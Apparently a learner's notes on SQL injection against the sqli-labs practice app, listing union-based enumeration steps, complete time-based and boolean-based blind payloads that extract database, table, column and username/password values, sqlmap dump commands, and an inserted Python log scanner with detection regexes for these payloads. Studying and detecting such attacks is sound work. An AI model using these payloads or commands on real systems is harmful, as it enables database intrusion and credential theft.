Notes
version(): the DBMS version
user(): the current user
database(): the current database
Determine the closing character (for example a single quote). Once the closing character is known, determine the number of columns with ORDER BY using binary search, then find the displayed positions with UNION SELECT *,*,* (note that the separator is a comma, not a full stop or semicolon).
First query the version, then the current database name. Listing all database names requires the information_schema database: group_concat(schema_name) from information_schema.schemata
Tables: group_concat(table_name) from information_schema.tables where table_schema='security'
(security is the database name and can be changed)
Columns: group_concat(column_name) from information_schema.columns where table_name='users'
(this lists the columns of the users table; users can be changed)
Blind injection is used when the page shows no output and returns no error messages.
Time-based blind injection
1. Length of the database name
and if(length(database())=8,sleep(5),1) -- -
2. ASCII value of each character of the database name
and if(ascii(substr((select database()),1,1))=115,sleep(5),1) -- -
3. Number of tables
and if((select count(*) from information_schema.tables where table_schema='security')=4,sleep(5),1) -- -
4. Length of a table name
and if((select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6,sleep(5),1) -- -
5. ASCII value of each character of a table name
and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) -- -
6. Number of columns
and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1) -- -
Boolean-based blind injection
1. Find the closing character
2. Length of the database name
and length(database())=8 %23
3. ASCII value of each character of the current database name
and ascii(substr(database(),1,1))=115 %23
4. Number of tables
and (select count(table_name) from information_schema.tables where table_schema='security')=4 %23
5. Length of a table name
and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 %23
6. ASCII value of each character of a table name
and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23
7. Number of columns
and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23
8. Length of a column name
and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 %23
9. ASCII value of each character of a column name
and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 %23
10. Number of rows (values in the field)
and (select count(username) from security.users)=13 %23
11. Length of a field value
and (select length(username) from security.users limit 0,1)=4 %23
12. ASCII value of each character of a field value
and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23
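On the detection side, the time-based and boolean-based payload shapes listed above are easy to recognise in web server access logs. The following is an added example (not part of these notes) that decodes the query string of each request and flags the signatures used in both sections; the log lines are constructed samples, and the signature names are my own labels:

```python
import re
from urllib.parse import unquote_plus

# Regexes for the payload shapes in the notes above (time-based, boolean-based,
# information_schema enumeration, UNION / ORDER BY probing). Applied to the
# decoded, lowercased query string of each request.
SIGNATURES = [
    ("time-based",    re.compile(r"\bif\s*\(.*\bsleep\s*\(")),
    ("boolean-based", re.compile(r"\b(ascii|length|count)\s*\(.*\)\s*[=<>]\s*\d+")),
    ("schema-enum",   re.compile(r"information_schema\.(tables|columns|schemata)")),
    ("union",         re.compile(r"\bunion\s+select\b")),
    ("column-count",  re.compile(r"\border\s+by\s+\d+")),
]
COMMENT = re.compile(r"--\s|#")          # the '-- -' and '%23' terminators from the notes
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP')

def decode_query(raw):
    """Percent-decode twice (catches %2527-style double encoding), collapse whitespace, lowercase."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw))).lower()

def classify(query):
    """Return the signature labels that fire on one decoded query string."""
    hits = [label for label, rx in SIGNATURES if rx.search(query)]
    if hits and COMMENT.search(query):
        hits.append("comment-terminated")
    return hits

def scan_log(lines):
    """Return (path, labels) for every request line whose query string matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or "?" not in m.group("path"):
            continue
        labels = classify(decode_query(m.group("path").split("?", 1)[1]))
        if labels:
            findings.append((m.group("path"), labels))
    return findings

# Constructed sample access-log lines in combined format (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=1%27%20and%20if(length(database())=8,sleep(5),1)%20--%20- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))=115%20%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-1/?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)=4%20%23 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for path, labels in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(labels))
```

A single boolean or time-based probe is one request, but the character-by-character enumeration above produces hundreds of near-identical requests from one client in a short window, so alerting on the count of flagged requests per source is more robust than on any one match.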
Injecting with a tool (sqlmap)
For GET requests: -u
For POST requests: -r
Taking level 1 (GET) as an example. GET: dump the current database with --current-db
sqlmap.py -u 127.0.0.1/sqli/Less-1/?id=1 -D security (-D specifies the database name)
sqlmap.py -u 127.0.0.1/sqli/Less-1/?id=1 -D security -T users --columns dumps all columns of the specified table (-T is followed by the table name)
sqlmap.py -u 127.0.0.1/sqli/Less-1/?id=1 -D security -T users -C id,password,username --dump dumps the contents of the listed fields (-C is followed by the column names; --dump dumps the field contents)